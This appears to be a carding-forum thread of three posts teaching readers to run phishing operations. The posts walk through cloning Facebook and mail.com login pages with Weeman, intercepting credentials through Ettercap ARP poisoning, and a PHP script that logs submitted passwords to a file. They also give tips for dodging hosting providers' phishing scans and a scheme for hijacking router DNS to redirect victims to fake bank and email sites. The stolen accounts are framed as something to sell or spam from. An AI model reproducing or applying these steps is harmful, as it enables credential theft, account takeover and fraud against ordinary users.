Phishing site in 5 minutes

Carder

Professional
Messages
2,616
Reaction score
1,934
Points
113
Today we will tell you about a simple but very useful tool that will help you get any phishing site up on your knees and in 5 minutes!

As a bonus, we will tell you how to do the same from your Android smartphone, as well as how to make a more powerful attack using Ettercap.

Attention! The information below is for educational purposes only and is not a call to action!

Weeman is a simple python HTTP server that generates phishing pages. It accepts user input and verifies registration information.

Let's get started
Let's look at dependencies first:

1. python 2.7;

2. pip2;

3. python-dev.

Installation​

First you need to clone it to your PC:
Code:
git clone https://github.com/evait-security/weeman.git
2de0968d8b9826024a154.png


Let's go to the weeman directory:

Code:
cd weeman

And run weeman.py:

Code:
sudo python2 weeman.py

After launch, we see the following picture.

bf19cc195bc63631d2a33.png


So let's start building a phishing site.

First, let's select our site:

Code:
set url https://www.facebook.com

Let's choose a port:

Code:
set port 8080

And let's write where after that it will direct the user:

Code:
set action_url https://www.facebook.com

And launch:

Code:
run

9dc84c4b885e56fe4bbca.png

04fbc5e032fe22ee24f59.png


Then if someone comes in and enters their data, we will see something like this:

Code:
email => 123456789@mail.com   
pass => 123456789

In order to plant this site on a victim, we can use an application like Ettercap or LanGhost to carry out a middleman attack.

Thanks to this, we will be able to intercept and analyze his traffic and even send our own traffic to his computer. In other words, due to the fact that he connected to our access point, we got full control over all incoming and outgoing data.

In addition, we will be able to intercept emails and passwords for other applications and networks. If desired, we can even implement meterpreter or another wiretap application into his system if we want to get more information.

Ettercap
Ettercap
is an open source utility for analyzing the security of computer networks. The main purpose of which is MITM attacks (Man In The Middle attacks). It has the ability to sniffing of live connections, filtering content on the fly, and many other interesting features. Supports both active and passive protocol attacks and includes a large number of functions for network and host analysis.

More information can be found on the official Ettercap website.

Install / Configure Ettercap​

You can download and install Ettercap from sources - here. Alternatively, you can use the following command:

Code:
apt-get install ettercap-gtk ettercap-common

Before proceeding, let's do a little setup. Open the file /etc/etter.conf:

Code:
nano /etc/etter.conf

Find these lines in it and uncomment them:

Code:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i% iface -p tcp --dport% port -j REDIRECT --to-port% rport"
redir_command_off = "iptables -t nat -D PREROUTING -i% iface -p tcp --dport% port -j REDIRECT --to-port% rport"

After all the above operations are done, launch Ettercap. However, for some, including me, Ettercap will not work. Errors like “ SEND L3 ERROR “ will appear . To prevent such errors from appearing, use the following command:

Code:
# echo "1" & gt; / proc / sys / net / ipv4 / ip_forward
# cat / proc / sys / net / ipv4 / ip_forward

Now everything should work fine and errors shouldn't pop up.

Interception of passwords​

First, look at the network architecture (see figure below) that will be used. This is necessary so that you understand well what is coming from and from where.

Launch Ettercap:

Code:
# ettercap -G

An application window will appear before us, as shown below.

646e8fe0ae286c0511e4e.jpg


Click on the Sniff -> Unified sniffing button. After that, we select the interface that is used. I have eth0.

a39e9bf21b468bc80258e.jpg


In the top menu, click the Hosts - Scan for hosts buttons.

3ae72585677a62bf94d60.jpg


Now we click again Hosts - Hosts list. A window will appear as shown in the figure below.

7165aae9ce618b41bc0c0.jpg


Here we need to choose goals, i.e. choose a machine that will act as a "victim" and a gateway. As you can see from the architecture of the network that we use, the machine with the IP address = 192.168.1.3 acts as a “victim”. Well, as a gateway, the IP address = 192.168.1.1. Therefore, select 192.168.1.3 and click the Add to Target 1 button. Now click on 192.168.1.1 and click the Add to Target 2 button.

Next, click Mitm - ARP poisoning. After that, select Sniff remote connections.

aac410db9b7bf1b1b63ff.jpg


Click OK. It remains only to run. To do this, click on the Start - Start sniffing button.

Sniffing is running. It remains to wait for the user to enter their data, for example, from an email account.

As soon as he entered his username / password and successfully entered his mailbox, the attacker also successfully intercepted his username and password:

Code:
HTTP: 94.100.184.17:443 - & gt; USER: <strong> my_testing_akk </strong> PASS: <strong> my_secret_password </strong> INFO: http://mail.com/

Bonus
We will use the Termux console to run Weeman on your Android device. Many people call Termux the best linux emulator, agree. Download and open. For the convenience of using the terminal, I advise you to download the additional Hacker's Keyboard, later you will understand why.

We start preparing for the installation, enter two commands in the console sequentially:

Code:
$ apt update

$ apt install

This operation may take some time, depending on your internet speed.

Further:

Code:
$ apt install git

The question "Do yo want to contiune? [Y / n]" appears. Yes, we want to continue, we enter a small "y" (this means yes).

The following command:

Code:
$ apt install python2

The question "Do yo want to contiune? [Y / n]" will appear again. We do the same.

With this command we have installed python (programming language), in which weeman is written.

Done, we have installed everything weeman needs to run.

Download weeman:

Code:
$ git clone https://github.com/evait-security/weeman

Great, let's write the command:

Code:
$ ls

It displays the contents of directories.

If after this command nothing appears in the console, then try repeating the steps above.

If everything is ok, then let's continue:

Code:
$ cd weeman

$ ls

These files appeared. Launch weeman:

Code:
$ python2 weeman.py

We succeeded, the installation was successful and we launched weeman.

To display the help for the commands in the console, write:

Code:
$ help

Now we need to set some settings (for example, Mail.com). Let's enter the following commands:

Code:
$ set url https://mail.com

$ set port 8080

$ set action_url https://mail.com

With the first command, we set the URL of the site that we want to copy.

Install the port with the second command.

The third command determines the address to which the person who provided their data will be sent.

We register show, check the correctness of the settings:

Code:
$ show

That's right, we continue:

Code:
$ run

All is ready. The server is running, here is its address:

Copy "http : // localhost : 8080" and enter it into the browser, but on the phone (now this server is local and exists only on your device). Further, everything is by analogy with the desktop.

Thank you all for your attention!
 
Doing Phishing With Pens

In this guide, we will cover every step needed to create and host a phishing page of your choice, and it will be convenient for beginners, and those who have never hosted a phishing / scam page will be able to understand and create their own.

Before proceeding to # step 1, make sure that you have a code editor, and the simplest one we use is Notepad++. You can download it for FREE by following this link https://notepad-plus-plus.org/

So now that you've downloaded the code editor, let's get down to business, okay?

#1. DOWNLOAD THE HTML INDEX
To get started, you need to get the HTML index of the page you are going to start with.

There are various ways to do this, there are even online templates for popular sites, but they all cost a bit, and those of you who are broke will come to us complaining why there is something in our guide that requires upfront payment, although it is not always possible to make money without investing anything in advance, but we have several FREE options to get around this particular one.

So, first of all, we will use the easiest way to be as friendly as possible for beginners.

So, we're going to use Facebook throughout this guide, so before you ask, "Can I use Gmail, MS360, YouTube, Chase Bank, Bank of America, Amazon, BestBuy, Ebay, or PayPal" the answer is YES!

#2. PAGE SOURCE CODE
Now, depending on your browser, there may be different methods. Usually, you need to right-click the site and select "Check" or "Check Item". Then you click "(index)".

#3. SAVING THE SOURCE CODE
Select the source you see by pressing "Ctrl + A" and copy and paste everything you see in the field, open your Notepad ++ that you downloaded earlier to paste it all there.

Use Notepad ++ on Windows and a simple text editing program for those who don't use Windows. (Do not use other programs).

After the code is inserted into your Notepad ++, click "Save As" or any other option that allows you to save this document.

You will save this file on your "desktop" to make it easier to find and process it.

In the "File name" field, name the document "index.html", clearly without quotation marks.

Change the "File Type" to the following:

"Hypertext markup language (*html;*. Htm; *. Shtml; *. Shtm; *. Xhtml; *. Xht;*. Hta)".

Congratulations! You have completed the first step of the lesson!

So now you can go to your desktop and open the file you just saved index.html.

Side note: If the page looks bad, it just means that the site has all sorts of files that you will need to display correctly, but don't worry, we will help you.

Go to the "HTTRACK" page to download the free program. it will solve all your problems and provide you with a website that displays perfectly in the folder, you're done!

Website: https://www.httrack.com/

Download page: https://www.httrack.com/page/2/en/index.html

Assuming you have a sorted portion of the site, now it's time for some technical questions, don't worry, you have cashoutempire.com We are at your side to accompany you every step of the way!

#4. PHP FILE FOR BUILDING PASSWORDS
This PHP file, which you will create next, will serve as a tool for collecting the user's password. Again, there are several ways to create this PHP file if you have some programming knowledge, but if you're not worried, just copy our PHP example below to your notepad ++.

Code:
<?php
header (‘Location: facebook.com’);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n\n\n\n”);
fclose($handle);
exit;
?>

Obviously, in the second line, you will change the "location URL" to match the URL of the site you are phishing / spamming.

The file name should be "post.php".

The "Save As" file type should be as follows:

"PHP Hypertext Preprocessor file (* .php;*. Php3; *. Php4; *. Php5; *. Phps; *. Phpt;*. Phtml)»

#5. Enabling HTML with a PHP password file
Now it's time to change the HTML file to include your PHP file so that you can get the passwords that users enter.

So let's see how a website works when a user submits a username and password. For Facebook, all you have to do is press Ctrl-F and type "action=" in the field. Now you need to replace everything in the underlined part with "post.php", keeping the quotation marks. (please only have one set). Obviously, this method will be different for other sites. A good way to find it is to use the Inspect Elements tool in most modern browsers and click the login button. Find something similar to the method above.

#6. PHP FILE FOR STORING PASSWORDS
And now the most interesting thing is to make your site for phishing / spamming online, so that other people can view it.

You can use any decent hosting services to host and store passwords. In this tutorial, we will use HostGator.

Let's assume that you have already created a website on your hosting service.

For HostGator, just click "File Manager" and click "Upload Files".

You just need to upload it to the main folder of your root folder.

Then you will upload your "PHP Files" and "Change Permission".

Now you need to change the resolution to "777", which means almost every resolution.

#7. HOSTING A PHISHING / SPAM PAGE
For this step, you will need to find your own hosting provider that you will use, otherwise you will be banned.

There's a reason why we don't use HostGator as our hosting provider for our actual pages, and that's because most hosting providers use automatic scanning to detect phishing pages, which they then ban after checking.

Let's move forward by setting up a forum post.php.

You need to find the login form again in your index.html and replace "post.php" to "https: //yourwebsiteforyourpostphpupload/post.php", assuming that you uploaded to the root folder.
Placing the actual page Go to htmlpasta.com.

Then you need to copy the file index.html for your phishing site and paste it there.

Now click reCAPTCHA and click "Insert", you will get a link to your website.

CONGRATULATIONS!
You have completed hosting your first phishing / spam website!

Go to your site and try to enter fake login details, after you click the login button, it should redirect you to facebook.com.

Log in to your FTP server that hosts your file post.php, and there should be a new document named Log.txt, which is stored in the same folder as your file post.php, since all login data must be stored there.
I fucked you in the mouth..oh..
 
The network today has a lot of stores that sell accounts to various social networks and mailers, as well as access to various online games.

Many people make good money on this. When buying such accounts, they even get explanations that this account is fake or brutus. However, since people stopped using easy passwords, the option of selecting a password is not particularly relevant.

That is why an effective and profitable method of mining accounts on the Internet is fake, for which a phishing site is used.

Most often, fakes are made to get a username and password from email services, Vkontakte, Facebook, and also hunt for credit card numbers. Based on this, it is immediately clear how you can get your money here – user accounts obtained fraudulently can later be used to send spam, sell, and intercept various payment orders.

At a time when the average user was not particularly literate and it was easy to lure a fake to the site, access to accounts poured in a river from fake sites. Now it is more difficult to attract a fake to the site. And yet it is still relevant.

I still use fakes, but not for mass destruction, so to speak. My phishing method is still relevant and effective today. I do this by using DNS substitutions on routers, since access to routers is now very easy to get because of the huge number of exploits to them, as well as the low security of the routers themselves.

How it happens:

Probably, we all know about the hosts file, in which you can specify the domain address with the IP address to it, so that we can access the site through the address bar and get to the desired IP address, getting the necessary information. So the DNS is a kind of notebook that stores domain addresses with the location (IP address) of the site we want to access.(under this domain)

I enter the site address in the form of google. com. This request goes to the DNS server, where this large address book is located. The DNS server looks for the IP address of the site location with this domain and sends us to this site. This way we get exactly where we wanted to go. And we trust this site without a second thought, we trust the DNS server.

When accessing someone else's router, in the DNS server settings, I specify my own primary DNS (address book), and the real address responsible for this directory of domain names is already specified as the secondary DNS. The second one is specified as a backup and access to the second address book occurs if the first "DNS directory" does not find the address to which we want to access.

- Well, how to muddy your DNS server is a completely different story.

So, the primary DNS is my server, the secondary one is already real. And now I'm creating this very directory with an indication of where to go when searching for a Facebook or Google, mail, a banking site, or whatever. Yes, and I fill out this directory of addresses, indicating that the site is not located at its real IP address, but at the address where the fake is located. And the user, without suspecting anything, typing the name google in the address bar, will be sent not to the real location of the original site, but to my fake.

To avoid getting caught on fake sites, check your router settings and prohibit access to the admin panel from outside.

Postscript: Phishing technologies flourished in 2005-2010.

Currently, largely due to the higher level of literacy of the population, phishing is not so effective, but it is still quite often used.
 
Top